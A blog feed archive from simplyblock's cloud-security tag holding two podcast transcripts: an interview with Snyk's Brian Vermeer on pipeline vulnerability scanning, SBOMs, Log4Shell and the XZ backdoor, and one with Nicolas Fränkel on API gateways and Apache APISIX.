Cloud Security Archives | simplyblock https://www.simplyblock.io/blog/tags/cloud-security/ NVMe-First Kubernetes Storage Platform Fri, 31 Jan 2025 12:34:02 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 https://www.simplyblock.io/wp-content/media/cropped-icon-rgb-simplyblock-32x32.png Cloud Security Archives | simplyblock https://www.simplyblock.io/blog/tags/cloud-security/ 32 32 Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk https://www.simplyblock.io/blog/automated-vulnerability-detection-throughout-your-pipeline-with-brian-vermeer-from-snyk-video/ Fri, 10 May 2024 12:12:16 +0000 https://www.simplyblock.io/?p=274 This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site . In this installment of podcast, we’re joined by Brian Vermeer ( Twitter/X , Personal Blog ) from Synk , a cybersecurity company providing tooling to detect common […]

The post Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk appeared first on simplyblock.

]]>
This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site .

In this installment of podcast, we’re joined by Brian Vermeer ( Twitter/X , Personal Blog ) from Synk , a cybersecurity company providing tooling to detect common code issues and vulnerabilities throughout your development and deployment pipeline, talks about the necessity of multi checks, the commonly found threads, and how important it is to rebuild images for every deployment, even if the code hasn’t changed.

EP11: Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk

Chris Engelbert: Welcome back everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have yet another amazing guest with me, Brian from Snyk.

Brian Vermeer: That’s always the question, right? How do you pronounce that name? Is it Snek, Snik, Synk? It’s not Synk. It’s actually it’s Snyk. Some people say Snyk, but I don’t like that. And the founder wants that it’s Snyk. And it’s actually an abbreviation.

Chris Engelbert: All right, well, we’ll get into that in a second.

Brian Vermeer: So now you know, I mean.

Chris Engelbert: Yeah, we’ll get back to that in a second. All right. So you’re working for Snyk. But maybe we can talk a little bit about you first, like who you are, where you come from. I mean, we know each other for a couple of years, but…

Brian Vermeer: That’s always hard to talk about yourself, right? I’m Brian Vermeer. I live in the Netherlands, just an hour and a half south of Amsterdam. I work for Snyk as a developer advocate. I’ve been a long term Java developer, mostly back end developer for all sorts of jobs within the Netherlands. Java champion, very active in the community, specifically the Dutch community. So the Netherlands Java user group and adjacent Java user groups do some stuff in the virtual Java user group that we just relaunched. That I’ve tried to be active and I’m just a happy programmer.

Chris Engelbert: You’re just a happy programmer. Does that even exist?

Brian Vermeer: Apparently, I am the living example.

Chris Engelbert: All right, fair enough. So let’s get back to Snyk and the cool abbreviation. What is Snyk? What does it mean? What do you guys do?

Brian Vermeer: Well, what we do, first of all, we create security tooling for developers. So our mission is to make security an integrated thing within your development lifecycle. Like in most companies, it’s an afterthought. Like one security team trying to do a lot of things and we have something in the pipeline and that’s horrible because I don’t want to deal with that. If all tests are green, it’s fine. But what if we perceive it in such a way as, “Hey, catch it early from your local machine.” Just like you do with unit tests. Maybe that’s already a hard job creating unit tests, but hey, let’s say we’re all good at that. Why not perceive it in that way? If we can catch things early, we probably do not have to do a lot of rework if something comes up. So that’s why we create tooling for all stages of your software development lifecycle. And what I said, Snyk is an abbreviation. So now you know.

Chris Engelbert: So what does it mean? Or do you forget?

Brian Vermeer: So Now You Know.

Chris Engelbert: Oh!

Brian Vermeer: Literally. So now you know.

Chris Engelbert: Oh, that took a second.

Brian Vermeer: Yep. That takes a while for some people. Now, the thought behind that is we started as a software composite analysis tool and people just bring in libraries. They have no clue what they’re bringing in and what kind of implications come with that. So we can do tests on that. We can report of that. We can make reports of that. And you can make the decisions. So now at least you know what you’re getting into.

Chris Engelbert: Right. And I think with implications and stuff, you mean transitive dependencies. Yeah. Stuff like that.

Brian Vermeer: Yeah.

Chris Engelbert: Yeah. And I guess that just got worse with Docker and images and all that kind of stuff.

Brian Vermeer: I won’t say it gets worse. I think we shifted the problem. I mean, we used to do this on bare metal machines as well that these machines also had an operating system. Right. So I’m not saying it’s getting worse, but developers get into more responsibility because let’s say we’re doing DevOps, whatever that may mean. I mean, ask 10 DevOps engineers. That’s nowadays a job. What DevOps is, you probably get a lot of questions about tooling and that, but apparently what we did is tearing down the wall between old fashioned developer creation and getting things to production. So the ops folks, so we’re now responsible as a team to do all of that. And now your container or your environment, your cluster, your code is all together in your Git repository. So it’s all code now. And the team creating it is responsible for it. So yes, it shifted the problem from being in separate teams now to all in one team that we need to create and maintain stuff. So I don’t, I don’t think we’re getting into worse problems. I think we’re, we’re shifting the problems and it’s getting easier to get into problems. That’s, that’s what I, yeah.

Chris Engelbert: Yeah. Okay. We’re, we’re broadened the scope of where you could potentially run into issues. So, so the way it works is that Snyk, I need to remember to say Snyk and not Synk because now it makes sense.

Brian Vermeer: I’m okay with however you call it. As long as you don’t say sync, I’m fine. That’s, then you’re actually messing up letters.

Chris Engelbert: Yeah, sync, sync is different. It’s, it’s not, it’s not awkward and it’s not Worcester. Anyway. So, so that means the, the tooling is actually looking into, I think the dependencies, built environment, whatever ends up in your Docker container or your container image. Let’s say that way, nobody’s using Docker anymore. And all those other things. So basically everything along the pipeline or the built pipeline, right?

Brian Vermeer: Yeah. You can say that actually we start at the custom code that you’re actually writing. So we’re doing static analysis on that as well. Might combine that with stuff that we know from your, let’s say all your dependencies that come in your dependencies, transitive dependencies, like, “hey, you bring in a spring boot starter that has a ton of implications on how many libraries come in.” Are these affected? Yes or no, et cetera, et cetera. That we go one layer deeper or around that, say your, your container images and let’s say it’s Docker because it’s still the most commonly used, but whatever, like any image is built on a base image and probably you streamlined some binaries in there. So what’s there, that’s another shell around the whole application. And then you get into, in the end, for instance, your configuration for your infrastructure is go to the bullet. That can go wrong by not having a security context or like some policies that are not bad or something like that. Some pods that you gave more privileges than you should have because, Hey, it works on my machine, right? Let’s ship it. These kinds of things. So on all these four fronts, we try to provide pooling and test capabilities in such a way that you can choose how you want to utilize these test capabilities, either in a CI pipeline or our local machine or in between or part of your build, whatever fits your needs. And instead of, Hey, this needs to be part of your build pipeline, because that’s how the tool works. And I was a developer myself for back end for backend jobs a long time. And I was the person that was like, if we need to satisfy that tool, I will find a way around it.

Chris Engelbert: Yeah, I hear you.

Brian Vermeer: Which defeats the purpose because, because at that point you’re only like checking boxes. So I think if these tools fit your way of working and implement your way of working, then you actually have an enabler instead of a wall that you bump into every time.

Chris Engelbert: Yeah. That makes a lot of sense. So that means when you, say you start at a code level, I think simple, like the still most common thing, like SQL injection issues, all that kind of stuff, that is probably handled as well, right?

Brian Vermeer: Yeah. SQL injections, path of virtual injections, cross-site scripting, all these kinds of things will get notified and we will, if possible, we will give you remediation advice on that. And then we go levels deeper. So it’s actually like, you can almost say it’s like four different types of scanner that you can use in whatever way you want. Some people are like, no, I’m just only using the dependency analysis stuff. That’s also fine. Like it’s just four different capabilities for basically four levels in your, in your application, because it’s no longer just your binary that you put in. It’s more than that, as we just discussed.

Chris Engelbert: So, when we look at like the recent and not so recent past, I mean, we’re both coming from the Java world. You said you’re also, you were a Java programmer for a long time. I am. I think the, I mean, the Java world isn’t necessarily known for like the massive CVEs. except Log4Shell.

Brian Vermeer: Yeah, that was a big,

Chris Engelbert: Right? Yeah.

Brian Vermeer: The thing, I think, is in the Java world, it’s either not so big or very big. There’s no in between, or at least it doesn’t get the amount of attention, but yeah, Log4Shell was a big one because first of all, props to the folks that maintain that, because I think there were only three active maintainers at that point when the thing came out and it’s a small library that is used and consumed by a lot of bigger frameworks. So everybody was looking at you doing a bad job. It was just three guys that voluntarily maintained it.

Chris Engelbert: So for the people that do not know what Log4Shell was. So Log4J is one of the most common logging frameworks in Java. And there was a way to inject remote code and execute it with basically whatever permission your process had. And as you said, a lot of people love to run their containers with root privileges. So there is your problem right there. But yeah, so Log4Shell was, I think, at least from what I can remember, probably like the biggest CVE in the Java world, ever since I joined.

Brian Vermeer: Maybe that one, but we had in 2017, we had the Apache struts, one that blew, blew, blew away, blew away our friendly neighborhood Equifax. But yeah.

Chris Engelbert: I’m not talking about struts because that was like so long deprecated by that point of time. It was, it was, it was … They deserved it. No, but seriously, yeah. True, true. The struts one was also pretty big, but since we are just recording it, this on April 3rd, there was just like a very, very interesting thing that was like two days ago, three days ago, like April 1st. I think it was actually April 1st, because I initially thought it’s an April’s Fool joke, but it was unfortunately not.

Brian Vermeer: I think it was the last day of March though. So it was not.

Chris Engelbert: Maybe I just saw it like April 1st. To be honest, initially I thought, okay, that’s a really bad April’s Fool. So what we’re talking about is the XZ issue. Maybe you want to say a few words about that or what?

Brian Vermeer: Well, let’s keep it simple. The XZ issue is basically an issue in one of the tools that come with some Linux distributions. And long story short, I’m not sure if they already created exploits on that. I didn’t, I didn’t actually try it because we’ve got folks that are doing the research. But apparently there, because of that tool, you could do nasty stuff such as arbitrary code executions or, or things with going into secure connections. At least it comes with your operating system. So that means if you have a Docker image or whatever image and you’re based on a certain well-known Linux distribution, you might be infected, regardless of whatever your application does. And it’s a big one. If you want to go deeper, there are tons of blogs of people that can explain to you what the actual problem was. But I think for the general developers, like, don’t shut your eyes and like, it’s not on my machine. It might be in your container because you’re using an outdated, now outdated image.

Chris Engelbert: I think there’s two things. First of all, I think it was found before it actually made it into any distribution, which is good. So if you’re, if you’re not using any of the like self-built distributions, you’re probably good. But what I found more interesting about it, that this backdoor was introduced from a person that was working on the tool for quite a while, like over a year or so, basically getting the trust of the actual maintainers and just sneaking stuff in eventually. And that is… That is why I think tools like Snyk or let’s, let’s be blunt, some of the competitors are so important, right? Because it’s, it’s really hard to just follow all of the new CVEs and sometimes they’re not blowing up this big. So you probably don’t even hear about them, but for that reason, it’s really important to have those tools.

Brian Vermeer: I totally agree. I mean, as a development team, it is a side effect for you, like you’re building stuff and you don’t focus on checking manually, whatever is coming in and if it’s vulnerable or not, but you should be aware of these kinds of things. And so if they come in, you can make appropriate choices. I’m not saying you have to fix it. That’s up to you, like, and your threat level and whatever is going on in your company, but you need to be able to make these decisions based on accurate knowledge and have the appropriate knowledge that you can actually make such a decision. And yeah, you don’t want to manually hunt these things down. You want to be actively pinged when something happens to your application that might have implications for it, for your security risk.

Chris Engelbert: Right. And from your own feeling, like, in the past, we mostly deployed like on-prem installations or in like private clouds, but with the shift to public cloud, do we increase the risk factor? Do we increase the attack surface?

Brian Vermeer: Yes. I think the short story, the short thing is, yes, there are more things that we have under our control as a development team. We do not always have the necessary specialties within the team. So we’re doing the best we can, but that means we’ve got multiple attack phases. Like your connection with your application is one thing, but this one is if I can get into your container for some reason, I can use this, even though at some, some things in containers or some things in operating systems might not be directly usable, but part of a chain that causes a problem. So I can get in in one, like if there’s one hole, I could get in and use certain objects or certain binaries in my chain of attacks and make it a domino effect, basically. So you’re, you’re giving people more and more ammunition. So, and as we automate certain things, we do not always have the necessary knowledge about certain things that might become bigger and bigger. Plus the fast pace we’re currently moving. Like, like tell me like 10 years ago, how were you deploying?

Chris Engelbert: I don’t know. I don’t remember. I don’t remember yesterday.

Brian Vermeer: Yeah. But I mean, probably not three times a day, like 10 years ago, we’re probably deploying once a month, you have time to test or something like that. So it’s a combination of doing all within one team, which yes, we should do, but also the fast pace that we need to release nowadays is something like, okay, we’re just doing it. The whole continuous development and continuous deployment is part of this. If you’re actually doing that, of course.

Chris Engelbert: Yeah, that’s, that’s true. I think it would have been like about every two weeks or so. But yeah, you normally had like one week development, one week bug fixing and testing, and then you deployed it. Now it’s like, you do something, you think it’s ready, it runs through the pipeline. And in the best case, it gets deployed immediately. And if something breaks, you gonna fix it. Or are you in the worst case, you roll back if it’s really bad.

Brian Vermeer: But on the other end, say you’re an application developer, and you need to do that stuff in a container. And do you ship it? Are you touching your container if you or rebuild your container if your application didn’t change?

Chris Engelbert: Yes.

Brian Vermeer: Probably, probably, probably a lot of folks won’t, because hey, did some, some things didn’t change, but it can be that the image your base your stuff upon or your base image or however you may manage that can be company wide, or you just will something out of Docker hub or whatever. That’s another layer that might have changed and might have been fixed or might have been vulnerabilities found in it. So it’s not anymore like, ‘hey, I didn’t touch that application. So I don’t have to rebuild.’ Yes, you should because other layers in that whole application changed.

Chris Engelbert: Right, right. And I think you brought up an important other factor. It might be that meanwhile, like, during the last we were in between the last deployment, and now a CVE has been found or something else, right? So you want to make sure you’re going to test it again. And then you have other programming languages, I’m not naming things here. But you might get a different version of the dependency, which is slightly newer. You’re doing a new install, right? And, and all of that are there’s so many different things, applications, these days, even micro services are so complex, because they normally need like, so many different dependencies. And it is hard to keep an eye on that. And that kind of brings me to the next question, like, how does snake play into something like SBOM or the software bill of materials?

Brian Vermeer: Getting into the hype train of SBOMs. Now, it’s not, it’s not just the hype train. I mean, it’s a serious thing. For folks that don’t know, you can compare the SBOM as your ingredients nutrition list for whatever you try to consume to stuff in your face. Basically, what’s in there, you have no clue, the nutrition facts on the package should say what’s in it, right? So that’s how you should perceive an SBOM. If you create an artifact, then you should create a suitable SBOM with it that basically says, ‘okay, I’m using these dependencies and these transitive dependencies, and maybe even these Docker containers or whatever, I’m using these things to create my artifact.’ And a consumer of that artifact is then able to search around that like say a CVE comes up, a new Log4Shell comes up, let’s make it big. Am I infected? That’s the first question, a consumer or somebody that uses your artifact says. And with an SBOM, you have a standardized, well, there are three standards, but nevertheless, like multiple standard, but there’s a standardized way of having that and make it at least machine searchable to see if you are vulnerable or not. So how do we play into that? Yes, you can use our sneak tooling to create SBOMs for your applications or for your containers, that’s possible. We have the capabilities to read SBOMs in to see if these SBOMs contain packages or artifacts or stuff that have known vulnerabilities. So you can again, take the appropriate measures. I think it’s, yes, SBOM is great from the consumer side. So it’s very clear what that stuff that I got from the internet or got from a supplier, because we’re talking about supply chain all the time, from a supplier within stuff that I build upon or that I’m using that I can see if it contains problems or it contains potential problems when something new comes up. And yes, we have capabilities of creating these SBOMs and scanning these SBOMs.

Chris Engelbert: All right. We’re basically out of time. But there’s one more question I still want to ask. And how do you or where do you personally see the biggest trend could be related to Snyk to security in general?

Brian Vermeer: The biggest trend is the hype of AI nowadays. And that is definitely a thing. What people think is that AI is a suitable replacement for a security engineer. Yeah, I exaggerate now, but that’s not because we have demos where we let a code assistant tool, a well known code assistant tool, spit out vulnerable code, for instance. So I think the trend is two things, the whole supply chain, software supply chain, whatever you get into, you should look at one thing. But the other tool is that if people are using AI, don’t trust it blindly. And I think it’s that’s for everything for both stuff in your supply chain, as in generated code by a code assistant. You should know what you’re doing. Like it’s a great tool. But don’t trust it blindly, because it can also hallucinate and bring in stuff that you didn’t expect if you are not aware of what you’re doing.

Chris Engelbert: So yeah. I think that is a perfect closing. It can hallucinate things.

Brian Vermeer: Oh, definitely, definitely. It’s a lot of fun to play with it. It’s also a great tool. But you should know it doesn’t first of all, it doesn’t replace developers that think. Like thinking is still something an AI doesn’t do.

Chris Engelbert: All right. Thank you very much. Time is over. 20 minutes is always super, super short, but it’s supposed to be that way. So Brian, thank you very much for being here. I hope that was not only interesting to me. I actually learned quite a few new things about Snyk because I haven’t looked into it for a couple of years now. So yeah, thank you very much. And for the audience, I hope you’re listening next week. New guest, new show episode, and we’re going to see you again.

The post Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk appeared first on simplyblock.

]]>
EP11: Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk
Improve Security with API Gateways, Nicolas Fränkel https://www.simplyblock.io/blog/how-api-gateways-help-to-improve-your-security-with-nicolas-frankel-from-api7-ai-video/ Fri, 19 Apr 2024 12:13:28 +0000 https://www.simplyblock.io/?p=287 In this installment of the podcast, we talked to Nicolas Fränkel (X/Twitter) from API7.ai, the creator of Apache APISIX, a high-performance open-source API gateway, discusses the significance of choosing tools that fit your needs, and emphasizes making choices based on what works best for your requirements. This interview is part of the simplyblock Cloud Commute […]

The post Improve Security with API Gateways, Nicolas Fränkel appeared first on simplyblock.

]]>
In this installment of the podcast, we talked to Nicolas Fränkel (X/Twitter) from API7.ai, the creator of Apache APISIX, a high-performance open-source API gateway, discusses the significance of choosing tools that fit your needs, and emphasizes making choices based on what works best for your requirements.

This interview is part of the simplyblock Cloud Commute Podcast, available on Youtube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

undefined

Chris Engelbert: Hello, everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast, your weekly 20-minute podcast show about cloud, cloud security, cloud storage, cloud Kubernetes. Today I have Nicolas with me, Nicolas Frankel. I think it’s a German last name, right?

Nicolas Fränkel: It’s a German last name. I’m French, and it’s spoken mostly by English speaking, so I don’t care anymore.

Chris Engelbert: All right, fair enough. You can jump right into that. Tell us a little bit about you, where you’re from, why you have a German last name, and being French, and everything else.

Nicolas Fränkel: I’m Nicolas Frankel. Yeah, I’m French. I was born in France. For a long time, I was a consultant in different roles, developer, architects, cloud architect, solution architect, whatever. I worked in projects with crazy deadlines, sometimes stupid management, changing requirements and stuff. And so I got very dissatisfied with it, and since a couple of years now I’m doing developer advocacy.

Chris Engelbert: Right, right. And we know each other from the Java world, so you’ve been a lot around the Java community for a long, long while.

Nicolas Fränkel: Yeah, I think we first met at conferences. I don’t remember which one, because it was quite long ago, but my main focus at the time was Java and the JVM.

Chris Engelbert: I think the first time was actually still JavaOne or something. So people that know a little bit of the Java space and remember JavaOne, you can guess how long this must be, or how far this must be ago. Right, so right now you’re working for a company called API7.

Nicolas Fränkel: So API7 is a company that is working on the Apache APISIX. Yeah, I agree. That’s funny. That was probably designed by engineers with no billboard marketing, but it’s still good, because 7 is better than 6, right? So Apache APISIX is an API gateway, and it’s an Apache project, obviously.

Chris Engelbert: All right, so you mentioned APISIX, and you obviously have the merch on you. So API7 is like the Python version, right? It’s one-based. APISIX is the zero-based version. We can argue which one is better.

Nicolas Fränkel: it’s a bit more complicated. So API7 is the company. All right. APISIX is the Apache projects, but API7 also has an offering called API7. So either you have an API7 on-premise version or an API7 cloud version. Yet you can think about it just like Confluent and Kafka. Of course, again, API7, APISIX, it’s a bit confusing. But just forget about the numbering. It’s just Confluent and Kafka. Confluent contributes on Kafka, but still they have their own offering. They do support on their own products, and they also have an on-premise and cloud version.

Chris Engelbert: All right, so that means that API7 as a company basically has probably the majority of engineers working on APISIX, which itself is a project in the Apache Foundation, right?

Nicolas Fränkel: I wouldn’t say they have the majority. To be honest, I didn’t check. But regarding the Apache Foundation, in order for a project to be promoted to top level, you must uphold a certain number of conditions. So the process goes like this. You go to the Apache Foundation, you give the project, and then you become part of the incubator. And in order to be promoted, you need to, as I mentioned, uphold a certain number of conditions that I didn’t check. But one of them is you must have enough committers from different companies. In order for one company not to be the only driving force behind the product, which in my opinion is a good thing. Whereas the CNCF, the project is managed by a company or different companies. In the Apache Foundation, the granularity is the contributor. So a contributor can afterwards, of course, change company or whatever. But in order to actually graduate from the incubator, you must have a certain number of people from different companies.

Chris Engelbert: Yeah, Ok. That makes sense. It’s supposed to be more of a community thing. I think that is the big thing with the Apache Foundation.

Nicolas Fränkel: That’s the whole point.

Chris Engelbert: Also, I think also in comparison or in difference from the Eclipse Foundation, where a lot of the projects are basically company driven.

Nicolas Fränkel: I don’t know about Eclipse. I know about this CNCF. I heard that in order to give your projects to the CNCF, you need to pay them money, which is a bit weird. Again, I didn’t proof-check that. But it’s company driven. You talk to companies. CNCF talk to companies. Whereas the Apache Foundation talk to people.

Chris Engelbert: Yeah, OK. Fair enough. All right. Let’s see. You said it’s an API gateway. So for the people that have not used an API gateway and have no idea what that means– and I think APISIX is a little bit more than just a standard gateway. So maybe can you elaborate a little bit?

Nicolas Fränkel: You can think about an API gateway as a reverse proxy on steroids that allows you to do stuff that is focused on APIs. I always use the same example of rate limiting. Rate limiting has been a feature of any reverse proxy since the 80s, because you want to protect your information system from distributed denial of service attacks. The thing is, it works very well. But then you need to consider every one of your clients the same. So you rate limit them exactly the same. Now imagine you are providing APIs. Probably there is a huge chance that you will want to give some offerings so that a couple of customers can get a higher limit than others. And it means that you can do that in a reverse proxy probably, but you would need to now add business logic into the reverse proxy. And as I mentioned, reverse proxy were designed at a time where they were completely, purely technical. They don’t like business logic so much. Nothing would prevent you from creating a C module and put it in NGINX and do that. But then you have or you encounter a couple of issues.

The first one is the open source version of NGINX. If you need to change the configuration, you need to switch it off and on again. If it sits at the entrance of your information system, it’s not great. And now the business logic might change every now and then and probably quite often, meaning it’s not great. That’s why those technical components, in general, they are not happy about business logic. You want to move the business logic away from those components. API gateways in my definition, because we will find plenty of definitions, first, you need to change the configuration dynamically. You don’t need to switch it then off and on again. And although you still don’t want to have too much business logic, it’s not unfriendly to business logic, meaning you can, for example, in Apache APISIX, you would create your plugin in Lua, and then you can change the Lua code. And then it’s fine.

Chris Engelbert: Right. Ok, so APISIX also uses Lua. I think that seems to be pretty much stable along a lot of the implementations.

Nicolas Fränkel: Not really. I mean, regarding the architecture, it’s based on NGINX. But as I mentioned, NGINX is not great for that. So on top of that, you have something called OpenResty. And OpenResty is actually Lua code that allows you to change the configuration of NGINX dynamically. The thing is, the configuration of OpenResty itself maps only one-to-one to the configuration of NGINX. So if you are doing it at scale, it’s not the best maintainability ever. So Apache APISIX provides you with abstractions. So what is an upstream? What is a route? Then you can reuse an upstream across several routes. What is a service? And everything is plugin-based. So it’s easy for routes to add a plugin, to remove a plugin, to change the configuration of plugin, and so on and so forth.

Chris Engelbert: Right, So from an applications perspective, or application developer’s perspective, do I need to be aware of that? Or does that all happen transparently to me?

Nicolas Fränkel: That’s the thing. It’s an infrastructure component. So normally, you shouldn’t care about it. You mostly don’t care about it. Even better, in general, a lot of stuff that you would do with frameworks or libraries like Spring or whatever, you can remove them from every individual app that you create and put them in these entry points at a very specific place. So your applications itself don’t need to protect the DDoS because the API gateway will do it for you. And you can also have authentication, authorization, caching, whatever. You can mostly move all those features away from your app, focus on your business logic, and just use the plugins that you need.

Chris Engelbert: Right, so you mentioned authentication. So I think it will hand me a JWT token or whatever kind of thing.

Nicolas Fränkel: For that we have multiple plugins. So yes, we have a JWT token. We have a Keycloak integration with a plugin. We have OpenID Connect. We have lots and lots of plugins. And if it’s plugin-based, then nothing prevents you from creating your own plugin. So either to interface with one of your own proprietary authentication systems, or if there is something that you want that is still generic, and then you can always contribute it back to the Apache Foundation, and then it becomes part of the products. And I mean, that’s the beauty of open source.

Chris Engelbert: Yeah, I agree. And I mean, we know each other for a long time. You know that I’m a big fan of open source for exactly all those reasons. Also from a company perspective, like a backing company, like in this case, API7, I think it makes a lot of sense. Because you get– I don’t want to say free help, but you get people that love your project, your product, and that are willing and happy to contribute as well.

Nicolas Fränkel: Exactly. I mean, we both worked for Hazelcast, although at different periods. And that was open source. But for me, this is the next step. The product is not only open source, and open source right at the moment is very interesting moment, because some companies are afraid that your product will be shrink-wrapped by the cloud provider, and they switch to an open license, which is not truly open source according to the creo. But the Apache Foundation is fully open source. So even if, for whatever reason, API7 decides not to work on the project anymore, then you can still have the project somewhere. And if you find a couple of maintainers, it means it’s still maintained.

Chris Engelbert: So from a deployment perspective, I guess I deploy that into Kubernetes, or?

Nicolas Fränkel: That’s the thing. It’s not focused on Kubernetes. So you can deploy that in any cloud provider, or even directly on the machine you choose. You have basically two modes. The first mode is the one that you would like to play with at first. So you deploy your nodes, and then you deploy etcd. So the same one used by Kubernetes to store its configuration. It’s a key-value distributed store. And then you can change the configuration of APISIX through an API call itself, and it will store its configuration in etcd. And then it’s very dynamic. If you have more maturity in GitOps, if you have more maturity in DevOps in general, perhaps you will notice that, oh, now where is my configuration? Well, in etcd. But now I need to back it up. How do I migrate? I need to move the data from etcd to another cluster. So it’s perhaps not the best production-grade way. So another way is to have everything static in YAML file. I hate YAML.

But at the moment, everybody is using YAML, and that’s the configuration. Like, at least Ops understand how to operate that. And so you have every node as its own set of YAML file, and then those YAML files are synchronized for GitOps to a GitHub repository. And then the GitHub repository is the source of truth, and it can be read, it can be audited, it can be whatever. Whereas if you store everything in etcd, it still works the same way, but it’s opaque. You don’t know what happens, right?

Chris Engelbert: I mean, the last thing you said with the GitHub repository being basically infrastructure as code, source of truth, that would probably then play into something like ArgoCD to deploy the updated version.

Nicolas Fränkel: Right, Ok. That makes sense. We don’t enforce any products. And actually, we just provide a way to statically configure Apache APISIX, and then you use whatever product you want. We are not partisan. We just allow you to do it.

Chris Engelbert: So from your own feeling, what do you think is the most common use case why people would use API gateways? Is that, as you said, rate limiting? I can see that as a very common thing, not only for companies like X or Twitter or whatever you want to call those these days, but also GitHub. I think every meaningful API has some kind of a rate limit. But I could also see DDoS attack, whereas I think people would probably use Cloudflare or any of these providers. What do you think is the biggest typical use case for that?

Nicolas Fränkel: If you are using APIs, you probably need something more than just a traditional reverse proxy. If you are using a reverse proxy, you are happy with your reverse proxy. You didn’t hit any limits of your reverse proxy. Just keep using your reverse proxy. As I mentioned, once you start to delve your feet into the API world, you will notice the reverse proxy is as the features are. It has some of the features that you want, but perhaps not the ease or the flexibility of configuration that you want. That said, you want to consider different clients in different ways. In that case, that’s probably the time where you need to think about, Ok, I need to think about migrating to an API gateway.

But context are so different that it’s very hard to provide a simple solution that caters to everybody’s need. But you could have a reverse proxy at the entrance of your whole information system. And at the second level, you would have the API gateway. Or you could have an API gateway for each different, I don’t know, domain of your organization, because your organization has different teams for every domain. And then, though it would be possible to have one gateway that is managed by different teams, then it makes a lot of sense to have different teams managing all their own configuration on their own component. But it’s like one micro-service. So everybody manages their own stuff. And you are sure that nobody will step on each other’s foot. But again, it depends a lot on the size, on how well you’re organized, on the maturity, on many different things. There are as many architectures as probably organizations.

Chris Engelbert: Just quickly, hinting back at Kubernetes, I think when– and I may be wrong here. If I use APISIX, I do not need any other ingress system, because APISIX can be the ingress provider for Kubernetes, doesn’t it?

Nicolas Fränkel: So getting back to Kubernetes, yes, we have an ingress controller. Or we have a hand chart. You can install APISIX inside your Kubernetes cluster. And it will serve as an ingress controller. So you will have the ingress controller itself. And it will configure Apache APISIX according to your manifests.

Chris Engelbert: All right, cool. So just looking at the time. Yeah, 20 minutes is not a lot. So when I want to use APISIX, should I call you guys at API7 Or should I go with the Apache project? Or should I do something else.

Nicolas Fränkel: It depends. I would always encourage people, if you are a tech person, to just take the project, use the Docker container, for example, try to play with it, try to change if it’s exactly what you need, try to understand the limits and the benefits in your own organization. Then if you’ve got questions, we’ve got a Slack that I can send you the reference, and then you can start to ask questions like, “Why in this case I tried to do that, and it works like this, and I wanted it to do that?” Then when you think that Apache APISIX is the right solution, then check if the open source version is enough. I believe if you are managing, if you are running a company, you will need to have some kind of support at some points. Up until that point, of course, just use the open source version, be happy with it. If you want to use it in a production-grade environment with support, with guarantees, and stuff, of course, please call us. It also pays my salary, so it’s also great. You’re welcome to play with the open source version and to check if it suits your requirements.

Chris Engelbert: Before we come to the last question, which is something I always have to ask people, maybe a quick comparison to other products. There are a lot of API gateways, at least in air quotes on the market. Why is APISIX special?

Nicolas Fränkel: First, every cloud provider comes with its own API gateway. My feeling is that all of them are much better integrated, much more limited in features. Again, if it suits you, then use them. That’s fine. If you find yourself at some point, you need to find workarounds, then perhaps it’s time to move away from them. Then about the comparison, the only really in-depth comparison I’ve done so far is with the Spring Cloud API gateway. I have written a blog post, but in short, if you are a developer team using Spring, knowing Spring, then use the Spring Cloud API gateway. It will be fine. If you want an Ops team to operate it, then probably it won’t be that great. The basic level, you can do a lot with YAML, and then you find yourself needing to write Java code. Ops people, I’m sorry, but they are not experts in writing Java code. You don’t want to have a compile phase.

Anyway, if you are a team, as I mentioned before, if you are a team, you manage your own domain, you have only developers or DevOps people, you are familiar with Java, you are expert in Spring, you want to only manage your own stuff, then perhaps it could be a very good gateway for your needs. Otherwise, I’m not sure it’s a great idea. Regarding the others, I honestly have no clue what’s the pros and the cons compared to Apache APISIX, but I know that Apache APISIX is the only truly open source project, the only one managed by the Apache Foundation. If you care about open source, not because you love open source so much, but you care about the future of the project, you care about long-term maintainability of the project, then it’s our main benefit. I won’t talk about performance or whatever, because, again, I didn’t do any benchmark myself, and every benchmark that is provided by any vendor can probably be discarded out of the box directly, because you should do your own benchmark in your own infrastructure.

Chris Engelbert: Yeah. I couldn’t have said that any better. It’s something that I keep telling people when they ask, whatever company you work for, there’s always people asking for benchmarks, and it’s always like, don’t believe benchmarks. Even if a vendor is really honest and tries to do meaningful benchmarks, it’s always an artificial dataset or whatever. Run your own benchmarks, do it with your own datasets, operational behavior and figure it out yourself. We can help you but you just don’t want to believe your benchmarks or not.

Nicolas Fränkel: Right. Exactly.

Chris Engelbert: Alright. Ok. So we’re coming to the end of our episode. And something that I always ask everybody is if there’s one thing that you think people should take away from our conversation today, what would that be?

Nicolas Fränkel: I think the most important thing is that regardless of the project or the tool that you choose, that you choose it for the right reasons. As I mentioned, if you’re using a cloud provider and if it suits your needs, then use it. If it doesn’t suit your needs, if it’s too limited, then don’t hesitate to move away. The good thing with the cloud is that you’re not stuck, right? And if you want a product that is focused on open source, and if you are in the open source space, I think Apache APISIX is a very good solution. And yeah, that’s it. Always make choices that fit your needs. And it’s good that you don’t have just one choice, right? You have a couple of them.

Chris Engelbert: That’s really well said. All right, so thank you very much, Nicolas, for being on the show. It was great having you.

Nicolas Fränkel: Thank you.

The post Improve Security with API Gateways, Nicolas Fränkel appeared first on simplyblock.

]]>
undefined